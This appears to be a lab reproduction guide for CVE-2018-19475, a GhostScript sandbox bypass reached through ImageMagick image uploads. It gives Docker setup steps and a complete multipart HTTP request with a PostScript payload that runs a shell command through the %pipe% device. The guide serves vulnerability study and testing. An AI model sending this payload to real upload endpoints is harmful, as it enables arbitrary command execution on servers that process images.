GhostScript Sandbox Bypass Command Execution (CVE-2018-19475)

中文版本(Chinese version)

GhostScript is a suite of software based on an interpreter for Adobe Systems' PostScript and PDF page description languages. It is widely used by many image processing libraries.

In late 2018, Man Yue Mo from the Semmle Security Research Team published a variant of CVE-2018-16509, designated as CVE-2018-19475. This vulnerability allows attackers to bypass GhostScript's sandbox through a malicious image and execute arbitrary commands in gs versions prior to 9.26.

References:

Environment Setup

Execute the following command to start a vulnerable environment (including GhostScript 9.25 and ImageMagick 7.0.8-20):

docker compose up -d

After the server is started, visit http://your-ip:8080 to see an upload component.

Vulnerability Reproduction

Upload the POC as an image to execute the command id > /tmp/success && cat /tmp/success:

POST /index.php HTTP/1.1
Host: target
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryukZmnyhO
Content-Length: 279

------WebKitFormBoundaryukZmnyhO
Content-Disposition: form-data; name="file_upload"; filename="1.jpg"
content-Type="image/png"

%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file
------WebKitFormBoundaryukZmnyhO--

As you can see, the command will be successfully executed.

In real-world scenarios, you may need to use out-of-band techniques to detect the vulnerability as direct output may not be available.